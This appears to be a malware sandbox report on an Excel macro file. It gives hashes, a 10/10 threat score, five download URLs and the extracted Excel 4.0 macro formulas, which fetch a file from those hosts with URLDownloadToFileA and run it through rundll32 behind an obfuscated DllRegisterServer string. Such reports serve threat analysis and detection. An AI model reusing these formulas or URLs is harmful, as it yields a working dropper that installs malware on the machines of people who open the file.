Overview

overview

10

Static

static

10

aff6ded528...2.xlsm

windows7-x64

10

aff6ded528...2.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    aff6ded528108840b660508b6d541aaf0cbef920b6fd53e1180e81b26d1b71a2

  • Size

    103KB

  • Sample

    241120-qym42sxbrg

  • MD5

    e782c44c88d2a48a39ba80a6e0112409

  • SHA1

    7216360c15ed2d8d97591cd8687d36417e4fceee

  • SHA256

    aff6ded528108840b660508b6d541aaf0cbef920b6fd53e1180e81b26d1b71a2

  • SHA512

    8f2b46cdd8004ae28c82bbca8dfd2ec0c0245b36fcb3a0af0b8770daac7544cb3dd5b03a36ccb25d75e903bb8f9fe6b5a882875b44be0f32cf45ce5b77df4671

  • SSDEEP

    3072:XHhRUVXHqu8hahYIfiQOVOveshVf4KwJQikmGox:3hRYXHrbtO8eOaDPk1ox

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://landorestates.com/wordpress/NELf96wr/

https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/

http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/

https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/

https://csinoticias.com/wp-includes/RnHjIzg/
Attributes
  • formulas

    =FORMULA() =TODO =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://landorestates.com/wordpress/NELf96wr/","..\wlw.ocx",0,0) =IF('TTGEHEHEHFHDG'!C15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://csinoticias.com/wp-includes/RnHjIzg/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\wlw.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://landorestates.com/wordpress/NELf96wr/
xlm40.dropper

https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/
xlm40.dropper

http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/
xlm40.dropper

https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/
xlm40.dropper

https://csinoticias.com/wp-includes/RnHjIzg/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://landorestates.com/wordpress/NELf96wr/
xlm40.dropper

https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/

Targets

    • Target

      aff6ded528108840b660508b6d541aaf0cbef920b6fd53e1180e81b26d1b71a2

    • Size

      103KB

    • MD5

      e782c44c88d2a48a39ba80a6e0112409

    • SHA1

      7216360c15ed2d8d97591cd8687d36417e4fceee

    • SHA256

      aff6ded528108840b660508b6d541aaf0cbef920b6fd53e1180e81b26d1b71a2

    • SHA512

      8f2b46cdd8004ae28c82bbca8dfd2ec0c0245b36fcb3a0af0b8770daac7544cb3dd5b03a36ccb25d75e903bb8f9fe6b5a882875b44be0f32cf45ce5b77df4671

    • SSDEEP

      3072:XHhRUVXHqu8hahYIfiQOVOveshVf4KwJQikmGox:3hRYXHrbtO8eOaDPk1ox

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks